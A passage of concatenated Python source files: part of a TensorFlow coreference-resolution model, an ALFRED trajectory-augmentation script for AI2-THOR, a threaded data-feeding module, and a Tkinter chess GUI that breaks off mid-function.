scores = tf.reduce_sum(span_start_emb * span_width_emb, axis=1)
return scores
def get_masked_mention_word_scores(self, encoded_doc, span_starts, span_ends):
num_words = util.shape(encoded_doc, 0) # T
num_c = util.shape(span_starts, 0) # NC
doc_range = tf.tile(tf.expand_dims(tf.range(0, num_words), 0), [num_c, 1]) # [K, T]
mention_mask = tf.logical_and(doc_range >= tf.expand_dims(span_starts, 1), doc_range <= tf.expand_dims(span_ends, 1)) #[K, T]
with tf.variable_scope("mention_word_attn"):
word_attn = tf.squeeze(util.projection(encoded_doc, 1, initializer=tf.truncated_normal_initializer(stddev=0.02)), 1)
mention_word_attn = tf.nn.softmax(tf.log(tf.to_float(mention_mask)) + tf.expand_dims(word_attn, 0))
return mention_word_attn
def softmax_loss(self, antecedent_scores, antecedent_labels):
gold_scores = antecedent_scores + tf.log(tf.to_float(antecedent_labels)) # [k, max_ant + 1]
marginalized_gold_scores = tf.reduce_logsumexp(gold_scores, [1]) # [k]
log_norm = tf.reduce_logsumexp(antecedent_scores, [1]) # [k]
return log_norm - marginalized_gold_scores # [k]
def bucket_distance(self, distances):
"""
Places the given values (designed for distances) into 10 semi-logscale buckets:
[0, 1, 2, 3, 4, 5-7, 8-15, 16-31, 32-63, 64+].
"""
logspace_idx = tf.to_int32(tf.floor(tf.log(tf.to_float(distances))/math.log(2))) + 3
use_identity = tf.to_int32(distances <= 4)
combined_idx = use_identity * distances + (1 - use_identity) * logspace_idx
return tf.clip_by_value(combined_idx, 0, 9)
def get_slow_antecedent_scores(self, top_span_emb, top_antecedents, top_antecedent_emb, top_antecedent_offsets, top_span_speaker_ids, genre_emb, segment_distance=None):
k = util.shape(top_span_emb, 0)
c = util.shape(top_antecedents, 1)
feature_emb_list = []
if self.config["use_metadata"]:
top_antecedent_speaker_ids = tf.gather(top_span_speaker_ids, top_antecedents) # [k, c]
same_speaker = tf.equal(tf.expand_dims(top_span_speaker_ids, 1), top_antecedent_speaker_ids) # [k, c]
speaker_pair_emb = tf.gather(tf.get_variable("same_speaker_emb", [2, self.config["feature_size"]], initializer=tf.truncated_normal_initializer(stddev=0.02)), tf.to_int32(same_speaker)) # [k, c, emb]
feature_emb_list.append(speaker_pair_emb)
tiled_genre_emb = tf.tile(tf.expand_dims(tf.expand_dims(genre_emb, 0), 0), [k, c, 1]) # [k, c, emb]
feature_emb_list.append(tiled_genre_emb)
if self.config["use_features"]:
antecedent_distance_buckets = self.bucket_distance(top_antecedent_offsets) # [k, c]
antecedent_distance_emb = tf.gather(tf.get_variable("antecedent_distance_emb", [10, self.config["feature_size"]], initializer=tf.truncated_normal_initializer(stddev=0.02)), antecedent_distance_buckets) # [k, c]
feature_emb_list.append(antecedent_distance_emb)
if segment_distance is not None:
with tf.variable_scope('segment_distance', reuse=tf.AUTO_REUSE):
segment_distance_emb = tf.gather(tf.get_variable("segment_distance_embeddings", [self.config['max_training_sentences'], self.config["feature_size"]], initializer=tf.truncated_normal_initializer(stddev=0.02)), segment_distance) # [k, emb]
span_width_emb = tf.nn.dropout(segment_distance_emb, self.dropout)
feature_emb_list.append(segment_distance_emb)
feature_emb = tf.concat(feature_emb_list, 2) # [k, c, emb]
feature_emb = tf.nn.dropout(feature_emb, self.dropout) # [k, c, emb]
target_emb = tf.expand_dims(top_span_emb, 1) # [k, 1, emb]
similarity_emb = top_antecedent_emb * target_emb # [k, c, emb]
target_emb = tf.tile(target_emb, [1, c, 1]) # [k, c, emb]
pair_emb = tf.concat([target_emb, top_antecedent_emb, similarity_emb, feature_emb], 2) # [k, c, emb]
with tf.variable_scope("slow_antecedent_scores"):
slow_antecedent_scores = util.ffnn(pair_emb, self.config["ffnn_depth"], self.config["ffnn_size"], 1, self.dropout) # [k, c, 1]
slow_antecedent_scores = tf.squeeze(slow_antecedent_scores, 2) # [k, c]
return slow_antecedent_scores # [k, c]
def get_fast_antecedent_scores(self, top_span_emb):
with tf.variable_scope("src_projection"):
source_top_span_emb = tf.nn.dropout(util.projection(top_span_emb, util.shape(top_span_emb, -1)), self.dropout) # [k, emb]
target_top_span_emb = tf.nn.dropout(top_span_emb, self.dropout) # [k, emb]
return tf.matmul(source_top_span_emb, target_top_span_emb, transpose_b=True) # [k, k]
def flatten_emb_by_sentence(self, emb, text_len_mask):
num_sentences = tf.shape(emb)[0]
max_sentence_length = tf.shape(emb)[1]
emb_rank = len(emb.get_shape())
if emb_rank == 2:
flattened_emb = tf.reshape(emb, [num_sentences * max_sentence_length])
elif emb_rank == 3:
flattened_emb = tf.reshape(emb, [num_sentences * max_sentence_length, util.shape(emb, 2)])
else:
raise ValueError("Unsupported rank: {}".format(emb_rank))
return tf.boolean_mask(flattened_emb, tf.reshape(text_len_mask, [num_sentences * max_sentence_length]))
def get_predicted_antecedents(self, antecedents, antecedent_scores):
predicted_antecedents = []
for i, index in enumerate(np.argmax(antecedent_scores, axis=1) - 1):
if index < 0:
predicted_antecedents.append(-1)
else:
predicted_antecedents.append(antecedents[i, index])
return predicted_antecedents
def get_predicted_clusters(self, top_span_starts, top_span_ends, predicted_antecedents):
mention_to_predicted = {}
predicted_clusters = []
for i, predicted_index in enumerate(predicted_antecedents):
if predicted_index < 0:
continue
assert i > predicted_index, (i, predicted_index)
predicted_antecedent = (int(top_span_starts[predicted_index]), int(top_span_ends[predicted_index]))
if predicted_antecedent in mention_to_predicted:
predicted_cluster = mention_to_predicted[predicted_antecedent]
else:
predicted_cluster = len(predicted_clusters)
predicted_clusters.append([predicted_antecedent])
mention_to_predicted[predicted_antecedent] = predicted_cluster
mention = (int(top_span_starts[i]), int(top_span_ends[i]))
predicted_clusters[predicted_cluster].append(mention)
mention_to_predicted[mention] = predicted_cluster
predicted_clusters = [tuple(pc) for pc in predicted_clusters]
mention_to_predicted = { m:predicted_clusters[i] for m,i in mention_to_predicted.items() }
return predicted_clusters, mention_to_predicted
def evaluate_coref(self, top_span_starts, top_span_ends, predicted_antecedents, gold_clusters, evaluator):
gold_clusters = [tuple(tuple(m) for m in gc) for gc in gold_clusters]
mention_to_gold = {}
for gc in gold_clusters:
for mention in gc:
mention_to_gold[mention] = gc
predicted_clusters, mention_to_predicted = self.get_predicted_clusters(top_span_starts, top_span_ends, predicted_antecedents)
evaluator.update(predicted_clusters, gold_clusters, mention_to_predicted, mention_to_gold)
return predicted_clusters
def load_eval_data(self):
if self.eval_data is None:
def load_line(line):
example = json.loads(line)
return self.tensorize_example(example, is_training=False), example
with open(self.config["eval_path"]) as f:
self.eval_data = [load_line(l) for l in f.readlines()]
num_words = sum(tensorized_example[2].sum() for tensorized_example, _ in self.eval_data)
print("Loaded {} eval examples.".format(len(self.eval_data)))
def evaluate(self, session, global_step=None, official_stdout=False, keys=None, eval_mode=False):
self.load_eval_data()
coref_predictions = {}
coref_evaluator = metrics.CorefEvaluator()
losses = []
doc_keys = []
num_evaluated= 0
for example_num, (tensorized_example, example) in enumerate(self.eval_data):
_, _, _, _, _, _, gold_starts, gold_ends, _, _ = tensorized_example
feed_dict = {i:t for i,t in zip(self.input_tensors, tensorized_example)}
# if tensorized_example[0].shape[0] <= 9:
if keys is not None and example['doc_key'] not in keys:
# print('Skipping...', example['doc_key'], tensorized_example[0].shape)
continue
doc_keys.append(example['doc_key'])
loss, (candidate_starts, candidate_ends, candidate_mention_scores, top_span_starts, top_span_ends, top_antecedents, top_antecedent_scores) = session.run([self.loss, self.predictions], feed_dict=feed_dict)
# losses.append(session.run(self.loss, feed_dict=feed_dict))
losses.append(loss)
predicted_antecedents = self.get_predicted_antecedents(top_antecedents, top_antecedent_scores)
coref_predictions[example["doc_key"]] = self.evaluate_coref(top_span_starts, top_span_ends, predicted_antecedents, example["clusters"], coref_evaluator)
if example_num % 10 == 0:
print("Evaluated {}/{} examples.".format(example_num + 1, len(self.eval_data)))
summary_dict = {}
if eval_mode:
conll_results = conll.evaluate_conll(self.config["conll_eval_path"], coref_predictions, self.subtoken_maps, official_stdout )
average_f1 = sum(results["f"] for results in conll_results.values()) / len(conll_results)
summary_dict["Average F1 (conll)"] = average_f1
print("Average F1 (conll): {:.2f}%".format(average_f1))
p,r,f = coref_evaluator.get_prf()
summary_dict["Average F1 (py)"] = f
print("Average F1 (py): {:.2f}% on {} docs".format(f * 100, len(doc_keys)))
summary_dict["Average precision (py)"] = p
print("Average precision (py): {:.2f}%".format(p * 100))
summary_dict["Average recall (py)"] = r
print("Average recall (py): {:.2f}%".format(r * 100))
return util.make_summary(summary_dict), f
|
augment_trajectories.py | import os
import sys
sys.path.append(os.path.join(os.environ['ALFRED_ROOT']))
sys.path.append(os.path.join(os.environ['ALFRED_ROOT'], 'gen'))
import json
import glob
import os
import constants
import cv2
import shutil
import numpy as np
import argparse
import threading
import time
import copy
import random
from gen.utils.video_util import VideoSaver
from gen.utils.py_util import walklevel
from env.thor_env import ThorEnv
TRAJ_DATA_JSON_FILENAME = "traj_data.json"
AUGMENTED_TRAJ_DATA_JSON_FILENAME = "augmented_traj_data.json"
ORIGINAL_IMAGES_FORLDER = "raw_images"
HIGH_RES_IMAGES_FOLDER = "high_res_images"
DEPTH_IMAGES_FOLDER = "depth_images"
INSTANCE_MASKS_FOLDER = "instance_masks"
IMAGE_WIDTH = 300
IMAGE_HEIGHT = 300
render_settings = dict()
render_settings['renderImage'] = True
render_settings['renderDepthImage'] = True
render_settings['renderObjectImage'] = True
render_settings['renderClassImage'] = True
video_saver = VideoSaver()
fail_log = open("fail_log.txt", "w")
def get_image_index(save_path):
max_img = max(len(glob.glob(save_path + '/*.png')), len(glob.glob(save_path + '/*.jpg')))
return max_img
def save_image_with_delays(env, action,
save_path, direction=constants.BEFORE):
im_ind = get_image_index(save_path)
counts = constants.SAVE_FRAME_BEFORE_AND_AFTER_COUNTS[action['action']][direction]
for i in range(counts):
save_image(env.last_event, save_path)
env.noop()
return im_ind
def save_image(event, save_path):
# rgb
rgb_save_path = os.path.join(save_path, HIGH_RES_IMAGES_FOLDER)
rgb_image = event.frame[:, :, ::-1]
# depth
depth_save_path = os.path.join(save_path, DEPTH_IMAGES_FOLDER)
depth_image = event.depth_frame
depth_image = depth_image * (255 / 10000)
depth_image = depth_image.astype(np.uint8)
# masks
mask_save_path = os.path.join(save_path, INSTANCE_MASKS_FOLDER)
mask_image = event.instance_segmentation_frame
# dump images
im_ind = get_image_index(rgb_save_path)
cv2.imwrite(rgb_save_path + '/%09d.png' % im_ind, rgb_image)
cv2.imwrite(depth_save_path + '/%09d.png' % im_ind, depth_image)
cv2.imwrite(mask_save_path + '/%09d.png' % im_ind, mask_image)
return im_ind
def save_images_in_events(events, root_dir):
for event in events:
save_image(event, root_dir)
def check_dir(path):
if os.path.exists(path):
return True
os.mkdir(path)
return False
def clear_and_create_dir(path):
if os.path.exists(path):
shutil.rmtree(path)
os.mkdir(path)
def augment_traj(env, json_file):
# load json data
with open(json_file) as f:
traj_data = json.load(f)
# make directories
root_dir = json_file.replace(TRAJ_DATA_JSON_FILENAME, "")
orig_images_dir = os.path.join(root_dir, ORIGINAL_IMAGES_FORLDER)
high_res_images_dir = os.path.join(root_dir, HIGH_RES_IMAGES_FOLDER)
depth_images_dir = os.path.join(root_dir, DEPTH_IMAGES_FOLDER)
instance_masks_dir = os.path.join(root_dir, INSTANCE_MASKS_FOLDER)
augmented_json_file = os.path.join(root_dir, AUGMENTED_TRAJ_DATA_JSON_FILENAME)
# fresh images list
traj_data['images'] = list()
if get_image_index(orig_images_dir) == get_image_index(high_res_images_dir) \
and get_image_index(high_res_images_dir) == get_image_index(depth_images_dir) \
and get_image_index(depth_images_dir) == get_image_index(instance_masks_dir):
print("already create: " + orig_images_dir + "\n")
fail_log.write("already create: " + orig_images_dir + "\n")
return
clear_and_create_dir(high_res_images_dir)
clear_and_create_dir(depth_images_dir)
clear_and_create_dir(instance_masks_dir)
# scene setup
scene_num = traj_data['scene']['scene_num']
object_poses = traj_data['scene']['object_poses']
object_toggles = traj_data['scene']['object_toggles']
dirty_and_empty = traj_data['scene']['dirty_and_empty']
# reset
scene_name = 'FloorPlan%d' % scene_num
env.reset(scene_name)
env.restore_scene(object_poses, object_toggles, dirty_and_empty)
print(high_res_images_dir)
env.step(dict(traj_data['scene']['init_action']))
# print("Task: %s" % (traj_data['template']['task_desc']))
# setup task
env.set_task(traj_data, args, reward_type='dense')
rewards = []
for ll_idx, ll_action in enumerate(traj_data['plan']['low_actions']):
# next cmd under the current hl_action
cmd = ll_action['api_action']
hl_action = traj_data['plan']['high_pddl'][ll_action['high_idx']]
# remove unnecessary keys
cmd = {k: cmd[k] for k in ['action', 'objectId', 'receptacleObjectId', 'placeStationary', 'forceAction'] if k in cmd}
if "MoveAhead" in cmd['action']:
if args.smooth_nav:
save_image(env.last_event, root_dir)
events = env.smooth_move_ahead(cmd, render_settings)
save_images_in_events(events, root_dir)
event = events[-1]
else:
save_image(env.last_event, root_dir)
event = env.step(cmd)
elif "Rotate" in cmd['action']:
if args.smooth_nav:
save_image(env.last_event, root_dir)
events = env.smooth_rotate(cmd, render_settings)
save_images_in_events(events, root_dir)
event = events[-1]
else:
save_image(env.last_event, root_dir)
event = env.step(cmd)
elif "Look" in cmd['action']:
if args.smooth_nav:
save_image(env.last_event, root_dir)
events = env.smooth_look(cmd, render_settings)
save_images_in_events(events, root_dir)
event = events[-1]
else:
save_image(env.last_event, root_dir)
event = env.step(cmd)
# handle the exception for CoolObject tasks where the actual 'CoolObject' action is actually 'CloseObject'
# TODO: a proper fix for this issue
elif "CloseObject" in cmd['action'] and \
"CoolObject" in hl_action['planner_action']['action'] and \
"OpenObject" in traj_data['plan']['low_actions'][ll_idx + 1]['api_action']['action']:
if args.time_delays:
cool_action = hl_action['planner_action']
save_image_with_delays(env, cool_action, save_path=root_dir, direction=constants.BEFORE)
event = env.step(cmd)
save_image_with_delays(env, cool_action, save_path=root_dir, direction=constants.MIDDLE)
save_image_with_delays(env, cool_action, save_path=root_dir, direction=constants.AFTER)
else:
save_image(env.last_event, root_dir)
event = env.step(cmd)
else:
if args.time_delays:
save_image_with_delays(env, cmd, save_path=root_dir, direction=constants.BEFORE)
event = env.step(cmd)
save_image_with_delays(env, cmd, save_path=root_dir, direction=constants.MIDDLE)
save_image_with_delays(env, cmd, save_path=root_dir, direction=constants.AFTER)
else:
save_image(env.last_event, root_dir)
event = env.step(cmd)
# update image list
new_img_idx = get_image_index(high_res_images_dir)
last_img_idx = len(traj_data['images'])
num_new_images = new_img_idx - last_img_idx
for j in range(num_new_images):
traj_data['images'].append({
'low_idx': ll_idx,
'high_idx': ll_action['high_idx'],
'image_name': '%09d.png' % int(last_img_idx + j)
})
if not event.metadata['lastActionSuccess']:
print("Replay Failed: %s" % (env.last_event.metadata['errorMessage']))
fail_log.write("Replay Failed: %s \n" % (env.last_event.metadata['errorMessage']))
raise Exception("Replay Failed: %s" % (env.last_event.metadata['errorMessage']))
reward, _ = env.get_transition_reward()
rewards.append(reward)
# save 10 frames in the end as per the training data
for _ in range(10):
save_image(env.last_event, root_dir)
# store color to object type dictionary
color_to_obj_id_type = {}
all_objects = env.last_event.metadata['objects']
for color, object_id in env.last_event.color_to_object_id.items():
for obj in all_objects:
if object_id == obj['objectId']:
color_to_obj_id_type[str(color)] = {
'objectID': obj['objectId'],
'objectType': obj['objectType']
}
augmented_traj_data = copy.deepcopy(traj_data)
augmented_traj_data['scene']['color_to_object_type'] = color_to_obj_id_type
augmented_traj_data['task'] = {'rewards': rewards, 'reward_upper_bound': sum(rewards)}
with open(augmented_json_file, 'w') as aj:
json.dump(augmented_traj_data, aj, sort_keys=True, indent=4)
# save video
images_path = os.path.join(high_res_images_dir, '*.png')
video_save_path = os.path.join(high_res_images_dir, 'high_res_video.mp4')
video_saver.save(images_path, video_save_path)
# check if number of new images is the same as the number of original images
if args.smooth_nav and args.time_delays:
orig_img_count = get_image_index(orig_images_dir)
new_img_count = get_image_index(high_res_images_dir)
print ("Original Image Count %d, New Image Count %d" % (orig_img_count, new_img_count))
if orig_img_count != new_img_count:
print("sequence length doesn't match\n" + high_res_images_dir + "\n")
fail_log.write("sequence length doesn't match\n" + high_res_images_dir + "\n")
fail_log.write("Original Image Count %d, New Image Count %d" % (orig_img_count, new_img_count))
raise Exception("WARNING: the augmented sequence length doesn't match the original")
def run():
'''
replay loop
'''
# start THOR env
env = ThorEnv(player_screen_width=IMAGE_WIDTH,
player_screen_height=IMAGE_HEIGHT)
skipped_files = []
while len(traj_list) > 0:
lock.acquire()
json_file = traj_list.pop()
lock.release()
print ("Augmenting: " + json_file)
try:
augment_traj(env, json_file)
except Exception as e:
import traceback
traceback.print_exc()
print ("Error: " + repr(e))
print ("Skipping " + json_file)
skipped_files.append(json_file)
fail_log.write(repr(e) + "\n")
fail_log.write(json_file + "\n")
env.stop()
print("Finished.")
# skipped files
if len(skipped_files) > 0:
print("Skipped Files:")
print(skipped_files)
traj_list = []
lock = threading.Lock()
# parse arguments
parser = argparse.ArgumentParser()
parser.add_argument('--data_path', type=str, default="data/2.1.0")
parser.add_argument('--split', type=str, default='valid_seen', choices=['train', 'valid_seen', 'valid_unseen'])
parser.add_argument('--smooth_nav', dest='smooth_nav', action='store_true')
parser.add_argument('--time_delays', dest='time_delays', action='store_true')
parser.add_argument('--shuffle', dest='shuffle', action='store_true')
parser.add_argument('--num_threads', type=int, default=1)
parser.add_argument('--reward_config', type=str, default='../models/config/rewards.json')
args = parser.parse_args()
# make a list of all the traj_data json files
for split in ['train/', 'valid_seen/', 'valid_unseen/']:
for dir_name, subdir_list, file_list in walklevel(args.data_path + split, level=2):
if "trial_" in dir_name:
json_file = os.path.join(dir_name, TRAJ_DATA_JSON_FILENAME)
# import pdb; pdb.set_trace()
if not os.path.isfile(json_file):
continue
traj_list.append(json_file)
# random shuffle
if args.shuffle:
random.shuffle(traj_list)
# start threads
# run()
threads = []
for n in range(args.num_threads):
thread = threading.Thread(target=run)
threads.append(thread)
thread.start()
time.sleep(1) |
data_flow.py | # -*- coding: utf-8 -*-
from __future__ import division, print_function, absolute_import
import numpy as np
import threading
try:
# Python 2
import Queue as queue
except Exception:
# Python 3
import queue
from . import utils
class DataFlow(object):
""" Data Flow.
Base class for using real time pre-processing and controlling data flow.
Supports pipelining for faster computation.
Arguments:
coord: `Coordinator`. A Tensorflow coordinator.
num_threads: `int`. Total number of simultaneous threads to process data.
max_queue: `int`. Maximum number of data stored in a queue.
shuffle: `bool`. If True, data will be shuffle.
continuous: `bool`. If True, when an epoch is over, same data will be
feeded again.
ensure_data_order: `bool`. Ensure that data order is keeped when using
'next' to retrieve data (Processing will be slower).
dprep_dict: dict. Optional data pre-processing parameter for performing
real time data pre-processing. Keys must be placeholders and values
`DataPreprocessing` subclass object.
dprep_dict: dict. Optional data augmentation parameter for performing
real time data augmentation. Keys must be placeholders and values
`DataAugmentation` subclass object.
"""
def __init__(self, coord, num_threads=8, max_queue=32, shuffle=False,
continuous=False, ensure_data_order=False,
dprep_dict=None, daug_dict=None):
self.coord = coord
self.num_threads = num_threads
self.max_queue = max_queue
self.shuffle = shuffle
self.continuous = continuous
if ensure_data_order:
self.num_threads = 1
self.max_queue = 1
self.dprep_dict = dprep_dict
self.daug_dict = daug_dict
self.interrupted = False
class FeedDictFlow(DataFlow):
""" FeedDictFlow.
Generate a stream of batches from a dataset. It uses two queues, one for
generating batch of data ids, and the other one to load data and apply pre
processing. If continuous is `True`, data flow will never ends until `stop`
is invoked, or `coord` interrupt threads.
Arguments:
feed_dict: `dict`. A TensorFlow formatted feed dict (with placeholders
as keys and data as values).
coord: `Coordinator`. A Tensorflow coordinator.
num_threads: `int`. Total number of simultaneous threads to process data.
max_queue: `int`. Maximum number of data stored in a queue.
shuffle: `bool`. If True, data will be shuffle.
continuous: `bool`. If True, when an epoch is over, same data will be
feeded again.
ensure_data_order: `bool`. Ensure that data order is keeped when using
'next' to retrieve data (Processing will be slower).
dprep_dict: dict. Optional data pre-processing parameter for performing
real time data pre-processing. Keys must be placeholders and values
`DataPreprocessing` subclass object.
dprep_dict: dict. Optional data augmentation parameter for performing
real time data augmentation. Keys must be placeholders and values
`DataAugmentation` subclass object.
index_array: `list`. An optional list of index to be used instead of
using the whole dataset indexes (Useful for validation split).
"""
def __init__(self, feed_dict, coord, batch_size=128, num_threads=8,
max_queue=32, shuffle=False, continuous=False,
ensure_data_order=False, dprep_dict=None, daug_dict=None,
index_array=None):
super(FeedDictFlow, self).__init__(coord, num_threads, max_queue,
shuffle, continuous,
ensure_data_order,
dprep_dict,
daug_dict)
self.feed_dict = feed_dict
self.batch_size = batch_size
self.n_samples = len(utils.get_dict_first_element(feed_dict))
# Queue holding batch ids
self.batch_ids_queue = queue.Queue(self.max_queue)
# Queue holding data ready feed dicts
self.feed_dict_queue = queue.Queue(self.max_queue)
# Create samples index array
self.index_array = np.arange(self.n_samples)
if index_array is not None:
self.index_array = index_array
self.n_samples = len(index_array)
# Create batches
self.batches = self.make_batches()
self.reset_batches()
# Data Recording
self.data_status = DataFlowStatus(self.batch_size, self.n_samples)
def next(self, timeout=None):
""" next.
Get the next feed dict.
Returns:
A TensorFlow feed dict, or 'False' if it has no more data.
"""
self.data_status.update()
return self.feed_dict_queue.get(timeout=timeout)
def start(self, reset_status=True):
""" start.
Arguments:
reset_status: `bool`. If True, `DataStatus` will be reset.
Returns:
"""
# Start to process data and fill queues
self.clear_queues()
self.interrupted = False
# Reset Data Status
if reset_status:
self.data_status.reset()
# Only a single thread needed for batches ids
bi_threads = [threading.Thread(target=self.fill_batch_ids_queue)]
# Multiple threads available for feed batch pre-processing
fd_threads = [threading.Thread(target=self.fill_feed_dict_queue)
for i in range(self.num_threads)]
self.threads = bi_threads + fd_threads
for t in self.threads:
t.start()
def stop(self):
""" stop.
Stop the queue from creating more feed_dict.
"""
# Send stop signal to processing queue
for i in range(self.num_threads):
self.batch_ids_queue.put(False)
# Launch a Thread to wait for processing scripts to finish
threading.Thread(target=self.wait_for_threads).start()
def reset(self):
""" reset.
Reset batch index.
"""
self.batch_index = -1
def interrupt(self):
# Send interruption signal to processing queue
self.interrupted = True
self.clear_queues()
def fill_feed_dict_queue(self):
while not self.coord.should_stop() and not self.interrupted:
batch_ids = self.batch_ids_queue.get()
if batch_ids is False:
break
data = self.retrieve_data(batch_ids)
# Apply augmentation according to daug dict
if self.daug_dict:
for k in self.daug_dict:
data[k] = self.daug_dict[k].apply(data[k])
# Apply preprocessing according to dprep dict
if self.dprep_dict:
for k in self.dprep_dict:
data[k] = self.dprep_dict[k].apply(data[k])
#all prepped, put the data into the queue
self.feed_dict_queue.put(data)
def fill_batch_ids_queue(self):
while not self.coord.should_stop() and not self.interrupted:
ids = self.next_batch_ids()
if ids is False:
break
self.batch_ids_queue.put(ids)
def next_batch_ids(self):
self.batch_index += 1
if self.batch_index == len(self.batches):
if not self.continuous:
self.stop()
return False
self.reset_batches()
batch_start, batch_end = self.batches[self.batch_index]
return self.index_array[batch_start:batch_end]
def retrieve_data(self, batch_ids):
feed_batch = {}
for key in self.feed_dict:
feed_batch[key] = \
utils.slice_array(self.feed_dict[key], batch_ids)
return feed_batch
def reset_batches(self):
if self.shuffle:
self.shuffle_samples()
# Generate new batches
self.batches = self.make_batches()
self.batch_index = -1
def make_batches(self):
return utils.make_batches(self.n_samples, self.batch_size)
def shuffle_samples(self):
np.random.shuffle(self.index_array)
def wait_for_threads(self):
# Wait for threads to finish computation (max 120s)
self.coord.join(self.threads)
# Send end signal to indicate no more data in feed queue
self.feed_dict_queue.put(False)
def clear_queues(self):
""" clear_queues.
Clear queues.
"""
while not self.feed_dict_queue.empty():
self.feed_dict_queue.get()
while not self.batch_ids_queue.empty():
self.batch_ids_queue.get()
class TFRecordsFlow(DataFlow):
def __init__(self, coord):
super(TFRecordsFlow, self).__init__(coord)
raise NotImplementedError
class DataFlowStatus(object):
""" Data Flow Status
Simple class for recording how many data have been processed.
"""
def __init__(self, batch_size, n_samples):
self.step = 0
self.epoch = 0
self.current_iter = 0
self.batch_size = batch_size
self.n_samples = n_samples
def update(self):
self.step += 1
self.current_iter = min(self.step * self.batch_size, self.n_samples)
if self.current_iter == self.n_samples:
self.epoch += 1
self.step = 0
def reset(self):
self.step = 0
self.epoch = 0
|
gui_tkinter.py | import board
import pieces
import os
from multiprocessing import Process, Queue
import Tkinter as tk
from PIL import Image, ImageTk
import time
turn = 0
flag = 0
class BoardGuiTk(tk.Frame):
pieces = {}
selected = None
selected_piece = None
hilighted = None
icons = {}
color1 = "white"
color2 = "grey"
rows = 8
columns = 8
@property
def canvas_size(self):
return (self.columns * self.square_size,
self.rows * self.square_size)
def __init__(self, parent, chessboard, square_size=64):
# print "Init"
self.chessboard = chessboard
self.square_size = square_size
self.parent = parent
canvas_width = self.columns * square_size
canvas_height = self.rows * square_size
tk.Frame.__init__(self, parent)
self.canvas = tk.Canvas(self, width=canvas_width, height=canvas_height, background="grey")
self.canvas.pack(side="top", fill="both", anchor="c", expand=True)
self.canvas.bind("<Configure>", self.refresh)
self.canvas.bind("<Button-1>", self.click)
# self.canvas.bind("<Button-1>", callback)
self.statusbar = tk.Frame(self, height=64)
self.button_quit = tk.Button(self.statusbar, text="New", fg="black", command=self.reset)
self.button_quit.pack(side=tk.LEFT, in_=self.statusbar)
self.button_save = tk.Button(self.statusbar, text="Save", fg="black", command=self.chessboard.save_to_file)
self.button_save.pack(side=tk.LEFT, in_=self.statusbar)
self.button_move = tk.Button(self.statusbar, text="Engine Move", fg="black", command=self.move_engine)
self.button_move.pack(side=tk.LEFT, in_=self.statusbar)
self.label_status = tk.Label(self.statusbar, text=" White's turn ", fg="black")
self.label_status.pack(side=tk.LEFT, expand=0, in_=self.statusbar)
self.button_quit = tk.Button(self.statusbar, text="Quit", fg="black", command=self.parent.destroy)
self.button_quit.pack(side=tk.RIGHT, in_=self.statusbar)
self.statusbar.pack(expand=False, fill="x", side='bottom')
def click(self, event):
# self.refresh()
# print "Click"
# Figure out which square we've clicked
global flag
global turn
col_size = row_size = event.widget.master.square_size
current_column = event.x / col_size
current_row = 7 - (event.y / row_size)
position = self.chessboard.letter_notation((current_row, current_column))
# print position
# print self.selected_piece
# piece = self.chessboard[position]
if self.selected_piece:
self.move(self.selected_piece[1], position)
# print "moved"
turn = 1
self.selected_piece = None
self.hilighted = None
self.pieces = {}
self.refresh()
self.draw_pieces()
flag=1
# Process(target=self.engine_move).start()
# self.engine_move()
if position is not None:
self.hilight(position)
self.refresh()
def engine_move(self):
# time.sleep(2)
var = open("C:\\Users\\dhrum\\Downloads\\Simple-Python-Chess-master-20190308T062157Z-001\\Simple-Python-Chess-master\\curr_board.in","w")
print self.chessboard.export()
var.write(self.chessboard.export())
var.close()
# os.system("g++ C:\\Users\\dhrum\\Downloads\\Simple-Python-Chess-master-20190308T062157Z-001\\Simple-Python-Chess-master\\bing.cpp")
# time.sleep(5)
print(os.system("C:\\Users\\dhrum\\Downloads\\Simple-Python-Chess-master-20190308T062157Z-001\\Simple-Python-Chess-master\\a.exe"))
# time.sleep(5)
var = open("C:\\Users\\dhrum\\Downloads\\Simple-Python-Chess-master-20190308T062157Z-001\\Simple-Python-Chess-master\\inp.in","r")
str1 = ""
str2 = ""
for xx in var:
str1 = xx[:2]
str2 = xx[2:]
var.close()
self.chessboard.move(str1, str2)
self.selected_piece = None
self.hilighted = None
self.pieces = {}
self.refresh()
self.draw_pieces()
def move(self, p1, p2):
# print "move"
global turn
piece = self.chessboard[p1]
dest_piece = self.chessboard[p2]
if dest_piece is None or dest_piece.color != piece.color:
try:
self.chessboard.move(p1, p2)
except board.ChessError as error:
self.label_status["text"] = error.__class__.__name__
else:
self.label_status["text"] = \
" " + piece.color.capitalize() +": "+ p1 + p2
# self.refresh()
# self.draw_pieces()
# self.chessboard.make_move("black")
# self.selected_piece = None
# self.hilighted = None
# self.pieces = {}
# self.refresh()
# self.draw_pieces()
def hilight(self, pos):
# print "hilight"
piece = self.chessboard[pos]
# print piece
if piece is not None and (piece.color == self.chessboard.player_turn):
self.selected_piece = (self.chessboard[pos], pos)
self.hilighted = map(self.chessboard.number_notation, (self.chessboard[pos].possible_moves(pos)))
def addpiece(self, name, image, row=0, column=0):
# print "addpiece"
'''Add a piece to the playing board'''
self.canvas.create_image(0, 0, image=image, tags=(name, "piece"), anchor="c")
self.placepiece(name, row, column)
def placepiece(self, name, row, column):
# print "placepiece"
'''Place a piece at the given row/column'''
# print name
# print row
# print column
# print "--"
self.pieces[name] = (row, column)
x0 = (column * self.square_size) + int(self.square_size/2)
y0 = ((7-row) * self.square_size) + int(self.square_size/2)
self.canvas.coords(name, x0, y0)
def refresh(self, event={}):
global flag
'''Redraw the board'''
# print "refresh"
# # self.engine_move()
if event:
xsize = int((event.width-1) / self.columns)
ysize = int((event.height-1) / self.rows)
self.square_size = min(xsize, ysize)
self.canvas.delete("square")
color = self.color2
for row in range(self.rows):
color = self.color1 if color == self.color2 else self.color2
for col in range(self.columns):
x1 = (col * self.square_size)
y1 = ((7-row) * self.square_size)
x2 = x1 + self.square_size
y2 = y1 + self.square_size
if (self.selected is not None) and (row, col) == self.selected:
self.canvas.create_rectangle(x1, y1, x2, y2, outline="black", fill="orange", tags="square")
elif (self.hilighted is not None and (row, col) in self.hilighted):
self.canvas.create_rectangle(x1, y1, x2, y2, outline="black", fill="spring green", tags="square")
else:
self.canvas.create_rectangle(x1, y1, x2, y2, outline="black", fill=color, tags="square")
color = self.color1 if color == self.color2 else self.color2
for name in self.pieces:
self.placepiece(name, self.pieces[name][0], self.pieces[name][1])
self.canvas.tag_raise("piece")
self.canvas.tag_lower("square")
def draw_pieces(self):
global flag
# print "draw pieces"
self.canvas.delete("piece")
for coord, piece in self.chessboard.iteritems():
x,y = self.chessboard.number_notation(coord)
if piece is not None:
